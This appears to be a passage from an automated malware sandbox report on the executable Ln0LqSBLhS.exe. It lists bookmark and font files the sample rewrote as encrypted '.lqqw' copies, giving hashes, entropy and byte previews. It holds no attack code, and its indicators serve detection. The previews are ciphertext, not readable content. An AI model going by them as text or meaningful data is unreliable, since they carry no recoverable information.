                                                                                                                                                                                                    Preview: ....R|...a.hH#.X.P.0(Hq*&.v....;Z8N...Qd/....:.......w$..y..n"n.~......S..tQI.aD.pO...b..<.3Up]...x..x.....})N..Q.UZ.`.z...:..........Qd.y.Y..U-w.'....1P~.g..f.V...c..o.*R....X...l0.`.....^!...R)..$.*..S\..y3.k..(t.....~..!.Sh..!.....o.....!.O..:...x..|./..ZM{....4.h].U.yz.........rs*rsI....q...<.jp...J.fS....l....r.#.<._e..cZ98.j]N..").......5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Favorites\Facebook.url.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):442
                                                                                                                                                                                                    Entropy (8bit):7.491168822192405
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:OOUF8RxWN9PWfheDxngyz/1sNjvUcii9a:OB8RxY9PwheDxngks5cbD
                                                                                                                                                                                                    MD5:CCA489FFE84EC1FAB144CE1F26D72834
                                                                                                                                                                                                    SHA1:BCD3063530639F7F61EC6F0018346192FCAB5BC7
                                                                                                                                                                                                    SHA-256:8B04A2A90388BFBF1FBDFB5ECE652A6AA5AD650BA7E8C40B0BCC6BD20F6F01A3
                                                                                                                                                                                                    SHA-512:38B483DC34943FBA620FB0FF10C93D836A4979C4F952C8824C84FA902023F7E822B8FBE9E2D6353EA54B0ABDABA14A2DFE7CFF8B69BE154B94A406EBA4AF9073
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....R|...a.hH#.X.P.0(Hq*&.v....;Z8N...Qd/....:.......w$..y..n"n.~......S..tQI.aD.pO...b..<.3Up]...x..x.....})N..Q.UZ.`.z...:..........Qd.y.Y..U-w.'....1P~.g..f.V...c..o.*R....X...l0.`.....^!...R)..$.*..S\..y3.k..(t.....~..!.Sh..!.....o.....!.O..:...x..|./..ZM{....4.h].U.yz.........rs*rsI....q...<.jp...J.fS....l....r.#.<._e..cZ98.j]N..").......5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Favorites\Google.url
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):440
                                                                                                                                                                                                    Entropy (8bit):7.40476468087666
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:1JW3RfDaUrnP7xHCUkoAUEFo4V1lldI75MmkXcii9a:i35DaUrn1HhklU7mTbI8bD
                                                                                                                                                                                                    MD5:EBA244973D5D322136AA83B8BDE19534
                                                                                                                                                                                                    SHA1:258B8994ECCD78C366C79414AB3E33B26B9BF769
                                                                                                                                                                                                    SHA-256:138ED584FA736F3DB96898937DE3C2ACBB7735BF71738F852A46233D0C7668D6
                                                                                                                                                                                                    SHA-512:327C91DEAD385C401B6CDE625C5FA704DBF05D25E810FB6EB0C864F2121C99F19B46EC58FEEE376E190DFCC93CBFD9B4EED934E27FD739CBADC3FA79ACC100EB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..l....^.z.b.$... ....$....c;]..::>.G.g6P..?..f.).u.>bG..J.2.sm .RrJ(h)k@.`@s.Z|...`Q.o.U)k.."....W..YDXH..x@.D...........d.m..R$.RG..C..Cay.q..O....G/.pr.z.....Z......D.@...(...O.H..uY{..w..w.............4..>.+. .d...+....P....1}MB...,.m.^3o....x..r.8..3Yj..1.....C.=,...E..~..I.@P|...n....P..K..Lj.hn2Z.'..yVV.j{Ip-..Z.U........n...5.....wn.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Favorites\Google.url.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):440
                                                                                                                                                                                                    Entropy (8bit):7.40476468087666
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:1JW3RfDaUrnP7xHCUkoAUEFo4V1lldI75MmkXcii9a:i35DaUrn1HhklU7mTbI8bD
                                                                                                                                                                                                    MD5:EBA244973D5D322136AA83B8BDE19534
                                                                                                                                                                                                    SHA1:258B8994ECCD78C366C79414AB3E33B26B9BF769
                                                                                                                                                                                                    SHA-256:138ED584FA736F3DB96898937DE3C2ACBB7735BF71738F852A46233D0C7668D6
                                                                                                                                                                                                    SHA-512:327C91DEAD385C401B6CDE625C5FA704DBF05D25E810FB6EB0C864F2121C99F19B46EC58FEEE376E190DFCC93CBFD9B4EED934E27FD739CBADC3FA79ACC100EB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..l....^.z.b.$... ....$....c;]..::>.G.g6P..?..f.).u.>bG..J.2.sm .RrJ(h)k@.`@s.Z|...`Q.o.U)k.."....W..YDXH..x@.D...........d.m..R$.RG..C..Cay.q..O....G/.pr.z.....Z......D.@...(...O.H..uY{..w..w.............4..>.+. .d...+....P....1}MB...,.m.^3o....x..r.8..3Yj..1.....C.=,...E..~..I.@P|...n....P..K..Lj.hn2Z.'..yVV.j{Ip-..Z.U........n...5.....wn.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Favorites\Live.url
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):438
                                                                                                                                                                                                    Entropy (8bit):7.466815257465393
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:NNRAa9TzH+hzc/s+UKxlPzz+WUPgtmefDDxfsVRw0P9DCwSt3/Fp76oIDVai75dS:NHSYnUKnzSTYs4sVRv1+we3desXcii9a
                                                                                                                                                                                                    MD5:65B463D0E6CAC83DC1B761E174A7F7C9
                                                                                                                                                                                                    SHA1:A023CA42EDB18425D4AD21DB7122E9F8A9E4D08D
                                                                                                                                                                                                    SHA-256:EFC6221CBB637F2F86FC80BEAD87BA55A013AFE1D7A80E36487DA0DDF50D2CBB
                                                                                                                                                                                                    SHA-512:F701FAB972B8D6A46BAFD9182C631C6C208294D6927784122F4E47D83E7C74DDE0C8728C93E9A9A08C5D0E46F4C33C04B62A1B44216E33BBFEDC456711F68BA2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .'..l<..`......Y......4..R..205W.+.......ZZ..:...K....P.D.F.N.i....=H%^/..H_.......V%.".D..(...#.[e,.% ..4..".bj..^.4......;[s....../.^..k.q..^......:..C...g'..6/.@./.O........$..?...s.....f..hQ....'....p._'b>+..........$-x.7.).....+t..Q.(......._.e...t.o.:...M..W..u.{..sm.H.9..IQ..k.n..>..Kd.*.9;lq..[...6...#6.....1G....Z&,z..X.j./..+^F.8...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Favorites\Live.url.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):438
                                                                                                                                                                                                    Entropy (8bit):7.466815257465393
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:NNRAa9TzH+hzc/s+UKxlPzz+WUPgtmefDDxfsVRw0P9DCwSt3/Fp76oIDVai75dS:NHSYnUKnzSTYs4sVRv1+we3desXcii9a
                                                                                                                                                                                                    MD5:65B463D0E6CAC83DC1B761E174A7F7C9
                                                                                                                                                                                                    SHA1:A023CA42EDB18425D4AD21DB7122E9F8A9E4D08D
                                                                                                                                                                                                    SHA-256:EFC6221CBB637F2F86FC80BEAD87BA55A013AFE1D7A80E36487DA0DDF50D2CBB
                                                                                                                                                                                                    SHA-512:F701FAB972B8D6A46BAFD9182C631C6C208294D6927784122F4E47D83E7C74DDE0C8728C93E9A9A08C5D0E46F4C33C04B62A1B44216E33BBFEDC456711F68BA2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .'..l<..`......Y......4..R..205W.+.......ZZ..:...K....P.D.F.N.i....=H%^/..H_.......V%.".D..(...#.[e,.% ..4..".bj..^.4......;[s....../.^..k.q..^......:..C...g'..6/.@./.O........$..?...s.....f..hQ....'....p._'b>+..........$-x.7.).....+t..Q.(......._.e...t.o.:...M..W..u.{..sm.H.9..IQ..k.n..>..Kd.*.9;lq..[...6...#6.....1G....Z&,z..X.j./..+^F.8...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Favorites\NYTimes.url
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):441
                                                                                                                                                                                                    Entropy (8bit):7.451033926193253
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:ATQEA1I2cYdl+gbDdQ1NRG9JJk3EsaGmJTcii9a:JRycHFfDJQGTbD
                                                                                                                                                                                                    MD5:5EE350547EE18EF7FB4D9E9F18F0A34F
                                                                                                                                                                                                    SHA1:4126FBE699B1DF5D3B72F51EBEBD8BE604FE28B4
                                                                                                                                                                                                    SHA-256:FBA3A52465468D9EE1FD423724B7784CA8CC39573DDF97CB06997D632222E725
                                                                                                                                                                                                    SHA-512:461E6F53C5CA0C3BA032F786340A2F7969D10DB8134BD081072E31E4321799758676B3F13C1E3AEF74E07758DBE12F4A952897AE605C6882E33FD3F90182E2BC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .*...x.M.C.;T'7.3l.h...%=..2A...$..z..b.<#.FP./..m5.......d1...W`.;..`.N.y3....E.0...u....he..?h...a..sSi[N}..a...\...;..@/.xy.....-(....<U..3....m..q..~......~.....[A.w+.A.^9#..N.{...$...z6zx:V......u!.{|...5.@.B.@+.+.E.2..a...uG...z.^...6.{.V.3...1us......Q....T}y..:...?>.....u%......f..v...f4.....@!.L.........?5..h......9.....L5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Favorites\NYTimes.url.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):441
                                                                                                                                                                                                    Entropy (8bit):7.451033926193253
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:ATQEA1I2cYdl+gbDdQ1NRG9JJk3EsaGmJTcii9a:JRycHFfDJQGTbD
                                                                                                                                                                                                    MD5:5EE350547EE18EF7FB4D9E9F18F0A34F
                                                                                                                                                                                                    SHA1:4126FBE699B1DF5D3B72F51EBEBD8BE604FE28B4
                                                                                                                                                                                                    SHA-256:FBA3A52465468D9EE1FD423724B7784CA8CC39573DDF97CB06997D632222E725
                                                                                                                                                                                                    SHA-512:461E6F53C5CA0C3BA032F786340A2F7969D10DB8134BD081072E31E4321799758676B3F13C1E3AEF74E07758DBE12F4A952897AE605C6882E33FD3F90182E2BC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .*...x.M.C.;T'7.3l.h...%=..2A...$..z..b.<#.FP./..m5.......d1...W`.;..`.N.y3....E.0...u....he..?h...a..sSi[N}..a...\...;..@/.xy.....-(....<U..3....m..q..~......~.....[A.w+.A.^9#..N.{...$...z6zx:V......u!.{|...5.@.B.@+.+.E.2..a...uG...z.^...6.{.V.3...1us......Q....T}y..:...?>.....u%......f..v...f4.....@!.L.........?5..h......9.....L5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Favorites\Reddit.url
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):440
                                                                                                                                                                                                    Entropy (8bit):7.359905404839913
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:zB5K6WY1JkXXe5bOsTeWvnEcSfFkK8zzqAxIXPVwKcii9a:zi3Y1JEXergtkLaJdwKbD
                                                                                                                                                                                                    MD5:CCB33130526BC5637C1F617D52D6F3D2
                                                                                                                                                                                                    SHA1:54FB366B0D225D521B1FDF5E64511DBC83F01AC6
                                                                                                                                                                                                    SHA-256:057644A6D9AC61821CBA9808A65908F743DDA530CFDF1552CAC4997D857E7F94
                                                                                                                                                                                                    SHA-512:FD203F63D650597E4EBFACA88CC623772E2605A4310DEF6B92CB7C9AD5E2AE62B5A4307D33F73D580C992A7F70AE59A2BA245C135BBD7DA93736F4100FE0B35F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: e\.)...(.S'g.)P...h.0.._..=...E....>.i.....UcQTe1.=.A....(.8]/6.T.g...|.d^.8....;...dA.rx..).M.....u}...H..)..r.H..).............$;i..+.F.X.r.rL.6o.0...U!...)8._i.l.7..7..l.U...l.Va.0.a._..Y.%..X1...........d....f...&.@-1....\..5)L8...zT..L...c......QB!N.f...$^..j.{<.....0-U)....<..Q....<'..[X=..Pp|...C.w..?z...c..u<....I.1P...K.T:..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Favorites\Reddit.url.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):440
                                                                                                                                                                                                    Entropy (8bit):7.359905404839913
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:zB5K6WY1JkXXe5bOsTeWvnEcSfFkK8zzqAxIXPVwKcii9a:zi3Y1JEXergtkLaJdwKbD
                                                                                                                                                                                                    MD5:CCB33130526BC5637C1F617D52D6F3D2
                                                                                                                                                                                                    SHA1:54FB366B0D225D521B1FDF5E64511DBC83F01AC6
                                                                                                                                                                                                    SHA-256:057644A6D9AC61821CBA9808A65908F743DDA530CFDF1552CAC4997D857E7F94
                                                                                                                                                                                                    SHA-512:FD203F63D650597E4EBFACA88CC623772E2605A4310DEF6B92CB7C9AD5E2AE62B5A4307D33F73D580C992A7F70AE59A2BA245C135BBD7DA93736F4100FE0B35F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: e\.)...(.S'g.)P...h.0.._..=...E....>.i.....UcQTe1.=.A....(.8]/6.T.g...|.d^.8....;...dA.rx..).M.....u}...H..)..r.H..).............$;i..+.F.X.r.rL.6o.0...U!...)8._i.l.7..7..l.U...l.Va.0.a._..Y.%..X1...........d....f...&.@-1....\..5)L8...zT..L...c......QB!N.f...$^..j.{<.....0-U)....<..Q....<'..[X=..Pp|...C.w..?z...c..u<....I.1P...K.T:..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Favorites\Twitter.url
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):441
                                                                                                                                                                                                    Entropy (8bit):7.4972280376034615
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:WR/Uln8zgXOOdhEA8FRTHMaUfB7+0+cii9a:W9U18ziOOwb/HMaUB7V+bD
                                                                                                                                                                                                    MD5:E9931D79622F7F4575CCA22E89F63A54
                                                                                                                                                                                                    SHA1:BE76AFA1E472544936AA9033F80EC3EDCF2E2CAB
                                                                                                                                                                                                    SHA-256:44F52262ECBE023A3830D566A8ED8A43B3E3E6A1CE185AD6C27A6BFAE39D8ACD
                                                                                                                                                                                                    SHA-512:2F12CB3A142231DCF3AF171AC487750BE44A49D51F91B57195FDCBAFF7B1A59F775CCFCCDFD7A330B2F1F03CCD8118BD518CC083CE103DC6352EBE9A812D6B1B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .dK.2..WX.C.A..7..SM7.'....!.Mn.w.^....q(..G....ju...Sn..0&..b.FV0.A..c?..(I.z-.u.YG[.....C.....>.T...c..T..z.O...9......c..rX.f.SM.?....f..,..H.r..l+.9"..C..Veu..,.....V..f..8r.].0.i.g&..n.t.l..s.S.....0.Bc+9.C.@.6!..=...q?..U..".........g.$.....<..T=>..v..S..t.c.....y.x..../.........{e...z;.z~d-..fI..O...`.Z._...WP.[.D.....w..<..t..{.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Favorites\Twitter.url.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):441
                                                                                                                                                                                                    Entropy (8bit):7.4972280376034615
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:WR/Uln8zgXOOdhEA8FRTHMaUfB7+0+cii9a:W9U18ziOOwb/HMaUB7V+bD
                                                                                                                                                                                                    MD5:E9931D79622F7F4575CCA22E89F63A54
                                                                                                                                                                                                    SHA1:BE76AFA1E472544936AA9033F80EC3EDCF2E2CAB
                                                                                                                                                                                                    SHA-256:44F52262ECBE023A3830D566A8ED8A43B3E3E6A1CE185AD6C27A6BFAE39D8ACD
                                                                                                                                                                                                    SHA-512:2F12CB3A142231DCF3AF171AC487750BE44A49D51F91B57195FDCBAFF7B1A59F775CCFCCDFD7A330B2F1F03CCD8118BD518CC083CE103DC6352EBE9A812D6B1B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .dK.2..WX.C.A..7..SM7.'....!.Mn.w.^....q(..G....ju...Sn..0&..b.FV0.A..c?..(I.z-.u.YG[.....C.....>.T...c..T..z.O...9......c..rX.f.SM.?....f..,..H.r..l+.9"..C..Veu..,.....V..f..8r.].0.i.g&..n.t.l..s.S.....0.Bc+9.C.@.6!..=...q?..U..".........g.$.....<..T=>..v..S..t.c.....y.x..../.........{e...z;.z~d-..fI..O...`.Z._...WP.[.D.....w..<..t..{.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Favorites\Wikipedia.url
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):443
                                                                                                                                                                                                    Entropy (8bit):7.475392772505011
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:DQVVXyu1CmeT3iYMFredDQQmbqAigcii9a:DQrCnCF8QQfCbD
                                                                                                                                                                                                    MD5:BA5CF7DB1873C88CE1FB51CFD02A8C97
                                                                                                                                                                                                    SHA1:9C52C568CB9FCBD52B63AE6DBF8FDF36C7960923
                                                                                                                                                                                                    SHA-256:B3F3BF6B79EE13F7C9858E8BBE398D2273609C2009545DF85FBEA3574F418035
                                                                                                                                                                                                    SHA-512:DE0912149073B3436056CA74A9CDC77F5B7C88D9E583D5EAA6B581674A1F9D006BCDB73DF8E88ABAE0D886E547C842A70F713569676BC6EE8DCE9BD065E3F826
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......@...F(...>...D^5...~.=..].rK.$" ...j......a..n..a...#.....<...z*%..p.9..X..5P...5.^.U.(...j.~f......)...m.SBl..t..m77F..`"Ym....$....=.{.{n.\..G...*?.oV`.87d.<.....n.h....&O.bT.....,....^..[bt......E..K.....V...5....;*f.B%.f......!...[g.k....s..>...i...188.....W`.9...R%.F.x.s.."]..[M.<.f..&bf..-.N....\..o..aY.|].e.2...H?...}.g...J.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Favorites\Wikipedia.url.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):443
                                                                                                                                                                                                    Entropy (8bit):7.475392772505011
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:DQVVXyu1CmeT3iYMFredDQQmbqAigcii9a:DQrCnCF8QQfCbD
                                                                                                                                                                                                    MD5:BA5CF7DB1873C88CE1FB51CFD02A8C97
                                                                                                                                                                                                    SHA1:9C52C568CB9FCBD52B63AE6DBF8FDF36C7960923
                                                                                                                                                                                                    SHA-256:B3F3BF6B79EE13F7C9858E8BBE398D2273609C2009545DF85FBEA3574F418035
                                                                                                                                                                                                    SHA-512:DE0912149073B3436056CA74A9CDC77F5B7C88D9E583D5EAA6B581674A1F9D006BCDB73DF8E88ABAE0D886E547C842A70F713569676BC6EE8DCE9BD065E3F826
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......@...F(...>...D^5...~.=..].rK.$" ...j......a..n..a...#.....<...z*%..p.9..X..5P...5.^.U.(...j.~f......)...m.SBl..t..m77F..`"Ym....$....=.{.{n.\..G...*?.oV`.87d.<.....n.h....&O.bT.....,....^..[bt......E..K.....V...5....;*f.B%.f......!...[g.k....s..>...i...188.....W`.9...R%.F.x.s.."]..[M.<.f..&bf..-.N....\..o..aY.|].e.2...H?...}.g...J.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Favorites\Youtube.url
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):441
                                                                                                                                                                                                    Entropy (8bit):7.376080822262823
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:HBdu278+I8Zhx5oMd21+g54OdN7UysG6847dNwcii9a:3N8+I8Zhx5oMAQgTAyf4dNwbD
                                                                                                                                                                                                    MD5:98EAE977AC2EBD13FEDD7E2264AEDE8A
                                                                                                                                                                                                    SHA1:F008A11B1D969D51A63EFE8054F933FF863F01E7
                                                                                                                                                                                                    SHA-256:4F15D11F53052D5AC9522BB259AA4A401F1A8B19508FDCD3EFDF34EC327FF5C4
                                                                                                                                                                                                    SHA-512:80B11B1BB972441242C6366F733F2F0335F9E8B193F9AF8AF5762D2CB435B0D22EAFF986F2E05BB207F69C880F194C1C01E977C54E1D63C293A4D26864E66385
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..<Rk.*Euc...\..gtR4..xC.p.@....RW..F...c.jvg.....6....S.....E...........[j.x...Q.Ag... d%H.<.#..q.&'~'.7y..[w'2.....p..73.2..{.R# ..uh[.A.X..)s..4..~4i.I.B.f./.q ...........W....'O..."$...E.1.qH...p...*.H.9..T..}..T.....-}.-.n.....b.n.`..N.....O.f.L@h.=...32..Lm..Rr..C.DB.F./.>.$..zt.O:D..w..-\..6q..!p.|q.W...{..>6P.Y..]k.i.x..0Ji..u~.#......5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Favorites\Youtube.url.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):441
                                                                                                                                                                                                    Entropy (8bit):7.376080822262823
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:HBdu278+I8Zhx5oMd21+g54OdN7UysG6847dNwcii9a:3N8+I8Zhx5oMAQgTAyf4dNwbD
                                                                                                                                                                                                    MD5:98EAE977AC2EBD13FEDD7E2264AEDE8A
                                                                                                                                                                                                    SHA1:F008A11B1D969D51A63EFE8054F933FF863F01E7
                                                                                                                                                                                                    SHA-256:4F15D11F53052D5AC9522BB259AA4A401F1A8B19508FDCD3EFDF34EC327FF5C4
                                                                                                                                                                                                    SHA-512:80B11B1BB972441242C6366F733F2F0335F9E8B193F9AF8AF5762D2CB435B0D22EAFF986F2E05BB207F69C880F194C1C01E977C54E1D63C293A4D26864E66385
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..<Rk.*Euc...\..gtR4..xC.p.@....RW..F...c.jvg.....6....S.....E...........[j.x...Q.Ag... d%H.<.#..q.&'~'.7y..[w'2.....p..73.2..{.R# ..uh[.A.X..)s..4..~4i.I.B.f./.q ...........W....'O..."$...E.1.qH...p...*.H.9..T..}..T.....-}.-.n.....b.n.`..N.....O.f.L@h.=...32..Lm..Rr..C.DB.F./.>.$..zt.O:D..w..-\..6q..!p.|q.W...{..>6P.Y..]k.i.x..0Ji..u~.#......5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeCMapFnt19.lst.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1364
                                                                                                                                                                                                    Entropy (8bit):7.822015497510397
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:UgmHdnV4+mWtilOiLvlmQSJ5E4HQz5+s/nA/nVwwGluXYjEnXbD:Ug0naOtil5pmfKCQtHDIXxnrD
                                                                                                                                                                                                    MD5:4E4C314D3E62C492A224CB32BE62E7EA
                                                                                                                                                                                                    SHA1:2693DC13CDAB513DEF68B1E9162C6F1D6A6809F4
                                                                                                                                                                                                    SHA-256:46D3FFCC71391D21B5738598E3DB2F1CA57CF3E8E88D1F5E4B58CDA006F0C24C
                                                                                                                                                                                                    SHA-512:7CBD8596C8579AAFA3A011F35FE05AD8C3C41FD539DC8AEE9707D7F4349FD710A6303DEBC7699928DDA56CCF17E87F07FA49DF8FD901C1FFBD1BB00DF51BE2A7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
